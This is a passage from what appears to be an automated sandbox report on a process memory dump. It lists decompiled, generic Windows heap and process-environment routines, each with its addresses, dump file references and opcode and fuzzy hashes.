				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E036DEB70(__ecx, 0x37b79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E037095D0();
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                      0x036e746d
                                      0x036e746d
                                      0x036e746d
                                      0x036e7471
                                      0x036e7488
                                      0x0372f92d
                                      0x036e748e
                                      0x036e7491
                                      0x036e7495
                                      0x0372f937
                                      0x0372f93a
                                      0x0372f94e
                                      0x0372f953
                                      0x0372f956
                                      0x0372f956
                                      0x036e7495
                                      0x00000000
                                      0x036e7488
                                      0x036e7473
                                      0x036e7478
                                      0x036e747d
                                      0x036e7481
                                      0x00000000
                                      0x036e7481
                                      0x036e747d
                                      0x036e747a
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 748c46809fa44edb794f6700d95132e3d418a6b2bd007da18b105d65f027c030
                                      • Instruction ID: 37e7ec6cd5ff871100a43626c332b7e56b7c965a41e6f3b0d9834aac6142e9ac
                                      • Opcode Fuzzy Hash: 748c46809fa44edb794f6700d95132e3d418a6b2bd007da18b105d65f027c030
                                      • Instruction Fuzzy Hash: 52F0E23A903244EADF11DB68C940F7ABFB1AF04210F080259E8E1AB2E1E7259805C7A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03798CD6, Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 36%
                                      			E03798CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x37bd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E036E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0370B640(E03709AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                      0x03798ce5
                                      0x03798ced
                                      0x03798cf0
                                      0x03798cfb
                                      0x03798d0d
                                      0x03798cfd
                                      0x03798d06
                                      0x03798d06
                                      0x03798d18
                                      0x03798d19
                                      0x03798d1b
                                      0x03798d20
                                      0x03798d33

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4c753ae465595980cb2f9dd4e9b8e34fca131120b0d8eb7909dbf73f1c7ab78a
                                      • Instruction ID: fb024395948d568bc543b4f8a24ef75b583b147481423a3a665ddfeba1433008
                                      • Opcode Fuzzy Hash: 4c753ae465595980cb2f9dd4e9b8e34fca131120b0d8eb7909dbf73f1c7ab78a
                                      • Instruction Fuzzy Hash: 43F08275A05208EBDF04EFB8E945E6E77B4EF09204F14019AE915EB2D1EA34D900C755
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036FA44B, Relevance: .0, Instructions: 29COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036FA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x37b7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0370FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                      0x036fa44b
                                      0x036fa453
                                      0x036fa472
                                      0x036fa476
                                      0x00000000
                                      0x036fa493
                                      0x036fa47a
                                      0x036fa47f
                                      0x036fa486
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 73e271bf059b76f6b67231a13ca83dd32132eaead689fccc320829598e8975a6
                                      • Instruction ID: e822755851ec523a1415987a934bb53746678d858fee11c272c94816cd2de95c
                                      • Opcode Fuzzy Hash: 73e271bf059b76f6b67231a13ca83dd32132eaead689fccc320829598e8975a6
                                      • Instruction Fuzzy Hash: 3CE09272A01821ABD2229A58ED00F67B3ADDBD5A51F094039E608DB254DA28DD12CBE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036CF358, Relevance: .0, Instructions: 28COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E036CF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E036FF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L036E4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                      0x036cf35d
                                      0x036cf361
                                      0x036cf367
                                      0x036cf372
                                      0x036cf38c
                                      0x036cf38c
                                      0x036cf394

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                      • Instruction ID: bad051f1e95fd481ec7941cfa0443135903d03c6ae40e2bfa4e79fc962c47b10
                                      • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                      • Instruction Fuzzy Hash: 39E0D832A41218BBCB21D6D99E05FAABBADDB44A60F04015AF908DF190D9609D00C3D0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036DFF60, Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036DFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x36a11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E037988F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E036E0050(_t14);
				}
			}










                                      0x036dff66
                                      0x036dff6b
                                      0x00000000
                                      0x036dff8f
                                      0x00000000
                                      0x036dff8f

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9a311f3c7374695b710a2b9f02bff0d23cea6796a23255993370a7e150a86174
                                      • Instruction ID: 77df1a0340ced31e823f76c7c4d345c042e724a32fd89eb50342ebeddb6f87f2
                                      • Opcode Fuzzy Hash: 9a311f3c7374695b710a2b9f02bff0d23cea6796a23255993370a7e150a86174
                                      • Instruction Fuzzy Hash: F0E0DFB4A053049FDB34DF56D240F2D7B9C9B42629F1D809EE00A4F201CA21D881C65A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0377D380, Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0377D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L036CE8B0(__ecx, _a4, 0xfff);
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                      0x0377d38a
                                      0x0377d39b
                                      0x0377d3b1
                                      0x00000000
                                      0x0377d3b6
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                      • Instruction ID: 2b8049489e1fa6b60066425543f31eb022209334636e702a21e39a2ab501a445
                                      • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                      • Instruction Fuzzy Hash: B9E08C35281244EBDF229A44CC00B797A2AEF447A1F204039FE085A690C6759C91E6C8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037541E8, Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E037541E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x37a08f0);
				_t5 = E0371D08C(__ebx, __edi, __esi);
				if( *0x37b87ec == 0) {
					E036DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x37b87ec == 0) {
						 *0x37b87f0 = 0x37b87ec;
						 *0x37b87ec = 0x37b87ec;
						 *0x37b87e8 = 0x37b87e4;
						 *0x37b87e4 = 0x37b87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L03754248();
				}
				return E0371D0D1(_t5);
			}





                                      0x037541e8
                                      0x037541ea
                                      0x037541ef
                                      0x037541fb
                                      0x03754206
                                      0x0375420b
                                      0x03754216
                                      0x0375421d
                                      0x03754222
                                      0x0375422c
                                      0x03754231
                                      0x03754231
                                      0x03754236
                                      0x0375423d
                                      0x0375423d
                                      0x03754247

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 447c52fb3736779c2395160e8a748d39db4d9b28b5fd7d460a5e22afedb6767c
                                      • Instruction ID: a19b078f56b8d3d16c116c38fc034dc3b1cede9042b39f3e57126491a49b9681
                                      • Opcode Fuzzy Hash: 447c52fb3736779c2395160e8a748d39db4d9b28b5fd7d460a5e22afedb6767c
                                      • Instruction Fuzzy Hash: 8BF039798107A8EFDBA0FFE9D508B2836BCF74431AF10816F90008B288E7784481CF06
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036FA185, Relevance: .0, Instructions: 20COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036FA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x37b67e4 >= 0xa) {
					if(_t5 < 0x37b6800 || _t5 >= 0x37b6900) {
						return L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E036E0010(0x37b67e0, _t5);
				}
			}





                                      0x036fa190
                                      0x036fa1a6
                                      0x036fa1c2
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036fa192
                                      0x036fa192
                                      0x036fa19f
                                      0x036fa19f

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ab87fcdf63eb466a532dc81a0fd112a432f578708057006b0dd9504d959cfd68
                                      • Instruction ID: f82168b13b9c72ea13ca96de5936b93eb9d7c89b06819480577fffb1a6f490d0
                                      • Opcode Fuzzy Hash: ab87fcdf63eb466a532dc81a0fd112a432f578708057006b0dd9504d959cfd68
                                      • Instruction Fuzzy Hash: FCD02B215210041FE61CF384D924B222636E784700F31441CE30B0E594DB6088D8950C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F16E0, Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036F16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E036F1710(0x37b67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L036E4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                      0x036f16e8
                                      0x036f16ef
                                      0x036f16f3
                                      0x036f16fe
                                      0x00000000
                                      0x036f1700
                                      0x036f170d
                                      0x036f170d
                                      0x036f16f2
                                      0x036f16f2
                                      0x036f16f2
                                      0x036f16f2

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9b0554a968bb209c887059b1c270d7aa700db20fca48c415bde1414c72b724b5
                                      • Instruction ID: 68e49fbd15a0ccb251cd2b0c5b0dc8a5aad4bcf827955ade30bd75420685c296
                                      • Opcode Fuzzy Hash: 9b0554a968bb209c887059b1c270d7aa700db20fca48c415bde1414c72b724b5
                                      • Instruction Fuzzy Hash: 83D0A931201200EAEE2EDB219918B142266EB81BC1F3C006CF31B5E9C0DFB1DCB2E04C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037453CA, Relevance: .0, Instructions: 16COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E037453CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E036DEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                      0x037453ca
                                      0x037453ce
                                      0x037453d9
                                      0x037453de
                                      0x037453e1
                                      0x037453e1
                                      0x037453e6
                                      0x037453f3
                                      0x00000000
                                      0x037453f8
                                      0x037453fb

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                      • Instruction ID: 9d7ec5aab3e0564513196116bf5de7001208befa03cea4cfdbe55ef076cf9f62
                                      • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                      • Instruction Fuzzy Hash: 30E08236A007809BCF12EB88CA90F4EB7F9FB89B00F280048A0086F620C724AC00CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036DAAB0, Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036DAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                      0x036daab6
                                      0x036daabb
                                      0x0372a442
                                      0x00000000
                                      0x0372a448
                                      0x0372a454
                                      0x0372a454
                                      0x036daac1
                                      0x036daac1
                                      0x036daac6
                                      0x036daac6

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                      • Instruction ID: 47ab607accf7e9ec17258ab20be4757ac7a5cec9efdfa5c33b2d2808782a5ce5
                                      • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                      • Instruction Fuzzy Hash: C9D0C939352980CFD616CB0CC554B0573A8BB04B80FC905D0E400CB761E63CD940CA00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F35A1, Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036F35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E036DEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                      0x036f35a1
                                      0x036f35a1
                                      0x036f35a5
                                      0x036f35ab
                                      0x036f35ab
                                      0x036f35b5
                                      0x00000000
                                      0x036f35c1
                                      0x036f35b7

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                      • Instruction ID: d7fe444239df80424e9c1e53b690aa1de7513184fb5626ec018f6e590f37d882
                                      • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                      • Instruction Fuzzy Hash: 53D0C93D9522849EDF53EB50C31877CB7B6BB80318F7C20A996460EB62C33A4A5AD605
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036CDB40, Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036CDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L036E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                      0x036cdb4d
                                      0x036cdb54
                                      0x036cdb5f
                                      0x036cdb56
                                      0x036cdb56
                                      0x036cdb5c
                                      0x036cdb5c

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                      • Instruction ID: 6c15674a925b21f05fcb77fe58f506a293bfb4231eecac03745d23c6c0b7cd2a
                                      • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                      • Instruction Fuzzy Hash: 37C08C70291B40AAEB229F20CE01B1077A0BB00B01F4800A46300DA0F0EF78D811E604
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0374A537, Relevance: .0, Instructions: 11COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0374A537(intOrPtr _a4, intOrPtr _a8) {

				return L036E8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                      0x0374a553

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                      • Instruction ID: cf95ec12dec55909a7260729d87fadbf34f70267b6da6a920af4e288fafa5704
                                      • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                      • Instruction Fuzzy Hash: 47C08C37080248BBCB12AF81CC00F167F2AFB94B60F008014FA080F570C632E974EB88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036E3A1C, Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036E3A1C(intOrPtr _a4) {
				void* _t5;

				return L036E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                      0x036e3a35

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                      • Instruction ID: f6de217e4031beb95b0eb7389b981d0dcf35eabf3795a3463f5a67eb14f45502
                                      • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                      • Instruction Fuzzy Hash: 49C08C32080248BBCB12AE42DC00F017B29E790B60F000020B6040B5608932EC60D58C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036D76E2, Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036D76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                      0x036d76e4
                                      0x00000000
                                      0x036d76f8
                                      0x036d76fd

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                      • Instruction ID: 9caf46886abe91cc01c65c76e2df8b852d6868d29aba65ff826c850a16719f21
                                      • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                      • Instruction Fuzzy Hash: F4C08C745422C05AEF2ADB08CF24B20B654AB08608F5C019CAA010D6A1D368A822C208
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036F36CC, Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036F36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                      0x036f36d2
                                      0x036f36e8
                                      0x036f36d4
                                      0x036f36e5
                                      0x036f36e5

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                      • Instruction ID: 98e571cea350fe81c92680250684fb7beb4a3744817f27210ecc0b8e6fb3f29c
                                      • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                      • Instruction Fuzzy Hash: 67C09B79155540BFDB169F30CE51F157354F740A61F7C075873214A6F0DD699C54D50C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036CAD30, Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036CAD30(intOrPtr _a4) {

				return L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                      0x036cad49

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                      • Instruction ID: 7acc525eb536de6aa8923e3b37268e862e6142e62fe298d7e8d727421fcd8378
                                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                      • Instruction Fuzzy Hash: 97C08C32080248BBCB12AA45DD00F017B29E790B60F100020F6040A6618932E860E588
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036E7D50, Relevance: .0, Instructions: 7COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E036E7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                      0x036e7d56
                                      0x036e7d5b
                                      0x036e7d60
                                      0x036e7d5d
                                      0x036e7d5d
                                      0x036e7d5d

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
